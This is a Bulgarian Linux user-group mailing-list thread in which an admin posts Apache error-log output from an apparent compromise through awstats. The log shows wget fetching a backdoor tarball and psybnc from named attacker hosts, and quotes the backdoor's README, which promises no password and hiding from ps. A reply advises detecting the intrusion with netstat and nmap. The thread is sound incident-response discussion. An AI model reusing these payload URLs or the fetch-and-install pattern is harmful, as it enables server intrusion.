Re: lug-bg: нещо интересно

[Georgi Genov <ggenov@xxxxxxxxxxx>]

D. Dilev wrote:

> Здравейте :)
>
> хоствам няколко сайта и ползвам awstats от 2г. като трафик анализатор за моя лична информция.
>
> Днес в 22:04 стартирах awstats за пореден път за да анализира логовете на апача. Съвсем случайно по това време бях пуснал следната команда:
> #tail -f /var/log/apache/*
>
> и наблюдавах активността на сайтовете... Малко след като стартирах awstats се появи следното в error.log файла:
>
> ==== cut ====
>
> sh: line 1: /awstats.mydomain.com.conf: No such file or directory
> --22:04:48--  http://www.petry.se/public_html/tw.tar.gz
>           => `tw.tar.gz'
> Resolving www.petry.se... done.
> Connecting to www.petry.se[195.47.247.72]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 16,414 [application/x-tar]
>
>    0K .......... ......                                     100%  141.85 KB/s
>
> 22:04:48 (141.85 KB/s) - `tw.tar.gz' saved [16414/16414]
>
> --22:04:51--  http://www.petry.se/public_html/tw.tar.gz
>           => `tw.tar.gz'
> Resolving www.petry.se... done.
> Connecting to www.petry.se[195.47.247.72]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 16,414 [application/x-tar]
>
>    0K .......... ......                                     100%  130.32 KB/s
>
> 22:04:52 (130.32 KB/s) - `tw.tar.gz' saved [16414/16414]
>
> sh: line 1: cd: rw: No such file or directory
> sh: line 1: ./bind: No such file or directory
> sh: line 1: fg: no job control
> --22:06:03--  http://geocities.com/sickady/p.tgz
>           => `p.tgz'
> Resolving geocities.com... done.
> Connecting to geocities.com[66.218.77.68]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 605,272 [application/x-compressed]
>
>    0K .......... .......... .......... .......... ..........  8%   81.83 KB/s
>   50K .......... .......... .......... .......... .......... 16%  235.85 KB/s
>  100K .......... .......... .......... .......... .......... 25%  253.81 KB/s
>  150K .......... .......... .......... .......... .......... 33%  242.72 KB/s
>  200K .......... .......... .......... .......... .......... 42%  248.76 KB/s
>  250K .......... .......... .......... .......... .......... 50%  250.00 KB/s
>  300K .......... .......... .......... .......... .......... 59%    2.33 MB/s
>  350K .......... .......... .......... .......... .......... 67%  240.38 KB/s
>  400K .......... .......... .......... .......... .......... 76%  252.53 KB/s
>  450K .......... .......... .......... .......... .......... 84%  255.10 KB/s
>  500K .......... .......... .......... .......... .......... 93%  253.81 KB/s
>  550K .......... .......... .......... .......... .         100%   25.04 KB/s
>
> 22:06:08 (144.59 KB/s) - `p.tgz' saved [605272/605272]
>
>
> tools/convconf.c: In function `cofile':
> tools/convconf.c:81: warning: deprecated use of label at end of compound statement
> gcc: installation problem, cannot exec `as': No such file or directory
> make: *** [all] Error 1
> ./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
> sh: line 1: fg: no job control
> --22:09:15--  http://geocities.com/sickady/p.tgz
>           => `p.tgz'
> Resolving geocities.com... done.
> Connecting to geocities.com[66.218.77.68]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 605,272 [application/x-compressed]
>
>    0K .......... .......... .......... .......... ..........  8%   78.49 KB/s
>   50K .......... .......... .......... .......... .......... 16%  231.48 KB/s
>  100K .......... .......... .......... .......... .......... 25%  236.97 KB/s
>  150K .......... .......... .......... .......... .......... 33%  239.23 KB/s
>  200K .......... .......... .......... .......... .......... 42%  238.10 KB/s
>  250K .......... .......... .......... .......... .......... 50%  240.38 KB/s
>  300K .......... .......... .......... .......... .......... 59%    2.12 MB/s
>  350K .......... .......... .......... .......... .......... 67%  233.64 KB/s
>  400K .......... .......... .......... .......... .......... 76%  238.10 KB/s
>  450K .......... .......... .......... .......... .......... 84%  252.53 KB/s
>  500K .......... .......... .......... .......... .......... 93%  255.10 KB/s
>  550K .......... .......... .......... .......... .         100%    1.11 MB/s
>
> 22:09:18 (230.17 KB/s) - `p.tgz' saved [605272/605272]
>
> ./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
> sh: line 1: fg: no job control
>
> ==== /cut ====
>
> Сами виждате - нещо изтегли и се опита да инсталира следните пакети при това по 2 пъти:
> 1. http://www.petry.se/public_html/tw.tar.gz
> 2. http://geocities.com/sickady/p.tgz
>
> Аз смятам че има връзка с awstats защотото, освен че се появи малко след стартиране на австатс (няколко секунди), забележете ред 1 от това което Ви пейстнах: 
> sh: line 1: /awstats.mydomain.com.conf: No such file or directory
> Какво е това? Задна врата в австатс? или уязвимост в австатс?
> аз изтеглих въпросните 2 пакета и в README файла на tw.tar.gz пише следното:
>
> 59768 port backdoor
> no password needed , easy to install and hiding from ps and ps ax:D
> have phun !
> wget at home.ro
>
> Другия пакет се оказа че е psybnc. Незнам за какво служи. 
> То и от последния ред който пейстнах там по-горе се вижда това:
> ./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
> sh: line 1: fg: no job control
>
> Всичко това стана пред очите ми.
> изпълних 
> updatedb
> locate psybnc
> locate p.tgz
> locate tw.tar.gz
> locate tools/convconf.c
> locate convconf.c
>
> и никоя от тях не намери нищо. 
>
> в логовете открих точно по същото време изпратени 2 мейла:
>
> from <anonymous@xxxxxxxxxxxx> to remote textercrew@xxxxxxxxx
> from <anonymous@xxxxxxxxxxxx> to remote TwiNkieonline@xxxxxxxxx
>
> Търсих, рових.... не намерих нищо друго подозрително!
>
> Сървъра е apache 1.3.33
>
> Вие какво мислите? как да процедирам?
>
> Благодаря за помощта!
>  
По принцип psybnc е irc proxy, но едвали при теб работи точно так.  
Понеже самото psybnc е само един binary файл лесно може да бъде 
подправен. И на практика да е например telnet демон със сигурност няма 
да го видиш стартиран никъде със сигурност няма и да го намериш а и да 
го намериш и изтриеш след рестарт ще го има пак. И със сигурност вече са 
те root-нали. Как можеш да рабереш дали има нещо такова. Пусни един един 
netstat и виж какви портове имаш отворени спри си firewall-а и от друга 
машина си сканирай портовете с nmap на тази хакнатата машина. Ако 
резултата от netstat и nmap показва ралики, например даден порт го няма 
в netstat а го има в nmap ... честито ... може да се пробваш да се 
телнетнеш на този порт може и да не ти иска парола направо root ....
--
Georgi Genov
ggenov@xxxxxxxxxxx

============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================